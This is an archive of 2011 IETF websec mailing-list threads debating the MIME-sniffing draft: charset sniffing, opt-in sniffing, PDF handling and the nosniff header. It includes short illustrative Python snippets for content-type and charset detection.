>> together with mime-sniffing

[websec] MIME sniffing test suite? Is there one?

2011-10-23 Thread Larry Masinter
I think it would be really helpful to have a test suite for MIME sniffing where 
we can test out what browsers do and various cases where sniffing *should* 
improve the experience, as well as test cases where sniffing makes things 
worse, if there are some.

Probably focusing on the test suite would help resolve some of the issues.

I'm willing to help populate the test suite but perhaps someone could to put up 
the infrastructure?

Larry



Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
I was talking about the necessary dependency of the specifications -- that you 
couldn't specify media type sniffing completely without making at least a 
normative reference to charset sniffing. 

The fact that the code works that way is evidence, of course, but we're not 
talking about possibility of implementation (where a single implementation is 
evidence) but rather orthogonality of interfaces (where the question is whether 
ALL implementations must follow this pattern.)

Larry




-Original Message-
From: Adam Barth [mailto:i...@adambarth.com] 
Sent: Sunday, October 23, 2011 8:37 PM
To: Larry Masinter
Cc: Tobias Gondrom; websec@ietf.org
Subject: Re: [websec] #22: content-type sniffing should include charset sniffing

I mean, that's how the code works, so it must be possible.  :)

Adam


On Sun, Oct 23, 2011 at 8:32 PM, Larry Masinter  wrote:
> I know it's complicated, but scanning text is necessarily part of determining 
> which application/something+xml  you have.  I think (but should really check 
> before saying this) that XML media type registrations describe what the 
> DOCTYPE or XML namespace or root element are, and that, to properly "sniff" 
> them, you'd have to scan text. But before you scan text, you have to 
> determine charset.
>
> So if we're going to support sniffing of media types in general, I don't see 
> how we can do that without also specifying charset determination.
>
>
>
> Larry
>
> -Original Message-
> From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On 
> Behalf Of Adam Barth
> Sent: Sunday, October 23, 2011 8:28 PM
> To: Tobias Gondrom
> Cc: websec@ietf.org
> Subject: Re: [websec] #22: content-type sniffing should include 
> charset sniffing
>
> The charset sniffing is also complicated by the fact that sometimes user 
> agents need to parse some of the HTML to find a <meta> element.
> In some situations, user agents need to restart the parsing algorithm, which 
> is quite delicate and better to describe in the same document as HTML parsing 
> (at least for use by HTML processing engines).
>
> Adam
>
>
> On Sun, Oct 23, 2011 at 8:24 PM, Tobias Gondrom  
> wrote:
>> 
>> I tend not to agree with that.
>>
>> The fact that charset sniffing might happen at the same time as 
>> mime-sniffing does not seem like a strong argument to include this in 
>> the draft.
>>
>> Furthermore I would rather have these issues separate:
>> First you determine the content-type and then after that you may want 
>> to determine the charset used within that content-type (if you really 
>> have to sniff the charset). I can also imagine that charset sniffing 
>> algorithm might be depending on the application identified by the 
>> sniffed mime-type, which again would speak against throwing it in together 
>> with mime-sniffing
>>
>> Kind regards, Tobias
>>
>>
>>
>> On 24/10/11 00:55, websec issue tracker wrote:
>>>
>>> #22: content-type sniffing should include charset sniffing
>>>
>>>  the HTML5 spec contains some algorithms for sniffing charset, 
>>> overriding
>>>  labeled charset, etc.
>>>
>>>  MIME parameters like charset are as much a part of the content-type 
>>> as the
>>>  base internet media type, and any sniffing of parameters and other
>>>  metadata (overriding content-type or guessing where it is not 
>>> supplied or
>>>  wrong) should be included in this document, since the sniffing will 
>>> happen
>>>  at the same time.
>>>
>>


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
I know it's complicated, but scanning text is necessarily part of determining 
which application/something+xml  you have.  I think (but should really check 
before saying this) that XML media type registrations describe what the DOCTYPE 
or XML namespace or root element are, and that, to properly "sniff" them, you'd 
have to scan text. But before you scan text, you have to determine charset.

So if we're going to support sniffing of media types in general, I don't see 
how we can do that without also specifying charset determination.
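The dependency Larry describes can be sketched in a few lines. This is illustrative only (a crude scan, not any registered sniffing procedure): to tell one application/something+xml from another you read the root element, and to read it you must first settle on a charset, here taken from the BOM or the XML declaration.

```python
# Crude root-element sniff for XML: charset determination (BOM or the
# encoding pseudo-attribute) has to happen before the text scan.
import re

def guess_xml_root(data: bytes) -> str:
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16")  # BOM fixes the charset
    else:
        m = re.search(rb'encoding=["\']([A-Za-z0-9._-]+)["\']', data[:100])
        enc = m.group(1).decode("ascii") if m else "utf-8"
        text = data.decode(enc)
    # Drop processing instructions and comments, then take the first tag name.
    text = re.sub(r"<\?.*?\?>|<!--.*?-->", "", text, flags=re.S)
    root = re.search(r"<([A-Za-z_][\w.:-]*)", text)
    return root.group(1) if root else ""

atom = b'<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom"/>'
print(guess_xml_root(atom))  # 'feed' -> suggests application/atom+xml
```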



Larry

-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Adam Barth
Sent: Sunday, October 23, 2011 8:28 PM
To: Tobias Gondrom
Cc: websec@ietf.org
Subject: Re: [websec] #22: content-type sniffing should include charset sniffing

The charset sniffing is also complicated by the fact that sometimes user agents 
need to parse some of the HTML to find a <meta> element.
In some situations, user agents need to restart the parsing algorithm, which is 
quite delicate and better to describe in the same document as HTML parsing (at 
least for use by HTML processing engines).
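The prescan Adam refers to can be approximated like this. The regex is a simplification of the HTML5 prescan, not the spec algorithm: peek at the first 1024 bytes for a `<meta ... charset=...>`, and if the declared charset contradicts the guess parsing started with, a real parser must restart.

```python
# Simplified stand-in for the HTML5 <meta> charset prescan.
import re

def prescan_meta_charset(head):
    m = re.search(rb'<meta[^>]+charset\s*=\s*["\']?([A-Za-z0-9._-]+)',
                  head[:1024], re.I)
    return m.group(1).decode("ascii").lower() if m else None

print(prescan_meta_charset(b'<html><head><meta charset="Shift_JIS">'))
# 'shift_jis'
```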

Adam


On Sun, Oct 23, 2011 at 8:24 PM, Tobias Gondrom  
wrote:
> 
> I tend not to agree with that.
>
> The fact that charset sniffing might happen at the same time as 
> mime-sniffing does not seem like a strong argument to include this in 
> the draft.
>
> Furthermore I would rather have these issues separate:
> First you determine the content-type and then after that you may want 
> to determine the charset used within that content-type (if you really 
> have to sniff the charset). I can also imagine that charset sniffing 
> algorithm might be depending on the application identified by the 
> sniffed mime-type, which again would speak against throwing it in together 
> with mime-sniffing
>
> Kind regards, Tobias
>
>
>
> On 24/10/11 00:55, websec issue tracker wrote:
>>
>> #22: content-type sniffing should include charset sniffing
>>
>>  the HTML5 spec contains some algorithms for sniffing charset, 
>> overriding
>>  labeled charset, etc.
>>
>>  MIME parameters like charset are as much a part of the content-type 
>> as the
>>  base internet media type, and any sniffing of parameters and other
>>  metadata (overriding content-type or guessing where it is not 
>> supplied or
>>  wrong) should be included in this document, since the sniffing will 
>> happen
>>  at the same time.
>>
>
> ___
> websec mailing list
> websec@ietf.org
> https://www.ietf.org/mailman/listinfo/websec
>


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
> First you determine the content-type and then after that you may want to 
> determine the charset used within that content-type

That's wishful thinking that doesn't match what has to happen ... the 
mime-sniffing document ALREADY is looking at the charset, by looking for 
byte-order-mark signatures to decide whether the content is text or binary.
So we're already doing charset detection, just not calling it that or 
completely specifying it.
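The observation amounts to this (signature table abridged for illustration; UTF-32 BOMs, for instance, are omitted): the text-vs-binary step is already a first fragment of charset detection.

```python
# Byte-order-mark signatures the text/binary step already recognizes;
# matching one is, in effect, charset detection.
BOMS = {
    b"\xef\xbb\xbf": "utf-8",
    b"\xfe\xff": "utf-16be",
    b"\xff\xfe": "utf-16le",
}

def bom_charset(data: bytes):
    for sig, name in BOMS.items():
        if data.startswith(sig):
            return name
    return None

print(bom_charset(b"\xef\xbb\xbfhello"))  # 'utf-8'
print(bom_charset(b"\x00\x01binary"))     # None
```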




Re: [websec] #20: Sniffing should be "opt in" on a case-by-case basis

2011-10-23 Thread Larry Masinter
> Agree with this one.
> With one addition: it must be clear that if you "opt-in" for sniffing, then 
> you MUST (SHOULD?) follow the mime-sniffing algorithm.

I don't think that's possible. I think the crux of this issue is that I don't 
think the "mime-sniffing algorithm" is currently structured in a way that lets 
the results be "opt-in" on a case-by-case basis.  


For example, the algorithm starts with an analysis of existing content-type 
headers, and winds up, in its state transition and communication paths, not 
letting later stages of the algorithm know whether the supplied content-type 
was malformed, whether there were two rather than one, etc.   So if you follow 
the algorithm, you don't have any way (at least if you're just following this 
algorithm) of "opting" later in ways that want to distinguish.  






Re: [websec] #19: Do not sniff PDF

2011-10-23 Thread Larry Masinter
> - in which way is it more certain that there is no mislabeled PDF than a 
> mislabeled jpg or mislabeled rtf?

I don't think this is relevant. There is likely mislabeled PDF. But I had 
specific feedback from implementors of PDF readers that sniffing from other 
content-type resulted in a worse situation than not sniffing. I don't have any 
information on jpg or rtf.

Sniffing should only be done when it is justified by an improved user 
experience over not sniffing. 

I think the obligation of evidence is "opt in": we should only sniff content 
when there is evidence of mislabeled content for which sniffing actually 
improves something, and the improvement outweighs other considerations.

> - what about scenarios in which there is no content-type (e.g. ftp, 
> filesystem), should in this case sniffing not be done?

I didn't get any feedback on that. I don't know any workflows where valid PDF 
doesn't carry a file type label somehow (if only the file extension .pdf), so 
maybe sniffing based on file content itself doesn't matter.

(Maybe this is another issue? I just wonder if the algorithm for "no 
content-type" is the same, or needs to be the same, as the algorithm for 
"content-type via HTTP".)




Larry



Re: [websec] Are all the issues filed? (was: Re: Using IETF Tracker for issues on MIME sniffing?)

2011-10-23 Thread Larry Masinter
I'd meant to do more careful write-ups of the issues I put into the tracker, 
but I've put in the main issues left over from draft-masinter-mime-sniff. 

The document also contains several sections (on sniffing fonts, for example) 
which are left as TBD. I suppose each of those is a separate "issue" to fill 
out.

Larry



[websec] Using IETF Tracker for issues on MIME sniffing?

2011-10-15 Thread Larry Masinter
Could we start using the IETF tracker to keep track of our conversation on the 
issues on MIME sniffing?

The interaction with a "nosniff" header should be one issue.
The other three big issues that come to mind are

* "scope" (to what situations does this apply)
* "opt-in case-by-case" (whether one either sniffs ALWAYS or sniffs NEVER, or 
whether it's more nuanced and based on expectation)
* "normative algorithm vs. invariants for specifications"


I'm willing to write up these issues and the sniffing ones from 
http://tools.ietf.org/html/draft-masinter-mime-web-info , and I hope we can 
capture Pete Resnick's issues as well as Alexey's.

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Tobias Gondrom
Sent: Sunday, October 02, 2011 2:44 PM
To: hal...@gmail.com
Cc: websec@ietf.org
Subject: Re: [websec] I-D Action:draft-ietf-websec-mime-sniff-03.txt
Importance: Low


Whether browsers will implement it, I can't tell. Maybe we can learn more when 
we progress further with the mime-sniff draft.

I don't have a strong opinion on the nosniff header.
Depending on where the mime-sniff debate will lead us, it might be a way to 
mitigate concerns that in certain cases you really SHOULD NOT or MUST NOT 
(RFC 2119) sniff. And with such a header you could enforce exactly that for 
your sources, without breaking other unknown things/sites - which is the main 
reason many browser vendors started sniffing in the first place.
(in one way nosniff could even be a migration path to less sniffing)
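For concreteness, the directive under discussion is the real `X-Content-Type-Options: nosniff` response header. A minimal stdlib sketch of a server opting a resource out of sniffing (the handler class and response body are illustrative):

```python
# Illustrative handler emitting the nosniff opt-out header.
from http.server import BaseHTTPRequestHandler

class NoSniffHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"user-supplied text, never to be sniffed into HTML"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        # Ask conforming user agents not to second-guess the label:
        self.send_header("X-Content-Type-Options", "nosniff")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
```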

Best regards, Tobias



On 01/10/11 15:30, Phillip Hallam-Baker wrote:
> On Sat, Oct 1, 2011 at 2:47 AM, Adam Barth  wrote:
>> On Fri, Sep 30, 2011 at 10:14 PM, "Martin J. Dürst"
>>   wrote:
>>> On 2011/09/29 11:45, Adam Barth wrote:
 On Wed, Sep 28, 2011 at 5:44 PM, "Martin J. Dürst"
 wrote:
> On 2011/09/29 8:26, Adam Barth wrote:
>> As I recall, the nosniff directive is pretty controversial.
> But then, as I recall, the whole business of sniffing is pretty 
> controversial to start with. Are there differences between the 
> controversiality of sniffing as such and the controversiality of 
> the nosniff directive that explain why one is in the draft and the 
> other is not?
 The reason why one is in and the other isn't is just historical.
 nosniff didn't exist at the time the document was originally written.
>>> Your first answer sounded as if the nosniff directive was too 
>>> controversial to be included in any draft, but your second answer 
>>> seems to suggest that it was left out by (historical) accident, and 
>>> that it might be worth to include it.
>> The essential question isn't whether we should include it in the 
>> draft.  The essential question is whether folks want to implement it.
>> If no one wants to implement it, putting it in the draft is a 
>> negative.  If folks want to implement, then we can deal with the 
>> controversy.
> +1
>
> The controversy seems to be of the 'cut off nose to spite face'
> variety. Sniffing is definitely terrible from a security perspective 
> but people do it. Java and Java Script were terrible as well but 
> people did them and then left the rest of us with a mess that had to 
> be fixed slowly over the next ten years.
>
> Sure this is not something we should have to think about but the fact 
> is that the browsers do it and it is better for the standards to 
> describe what the browsers actually do than what people think they 
> should do.
>
>



[websec] Comments on mime-sniff from Jan 2010 and in internet-draft

2011-03-31 Thread Larry Masinter
On 20 January 2010, I sent comments about draft-abarth-mime-sniff-03:
http://www.ietf.org/mail-archive/web/apps-discuss/current/msg01250.html

to the "apps discuss" mailing list; there were responses, but I disagree with 
them: I do not believe that the goal of having all agents sniff identically is 
possible, or even a realistic or important goal. Minimizing the opportunities 
for unnecessary privilege escalation seems like a much more important goal.

However, I urge the websec working group to review the comments and the 
responses.

In addition

http://tools.ietf.org/html/draft-masinter-mime-web-info

sections 3.3, 5.1.1 and 5.2 make specific comments about, and recommendations 
for, sniffing and its interactions with the MIME registry.


Larry
--
http://larry.masinter.net

From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
=JeffH
Sent: Wednesday, March 30, 2011 3:44 AM
To: IETF WebSec WG; Tobias Gondrom
Subject: [websec] slides: hodges-ietf-80-hodges-framework-reqs-Status

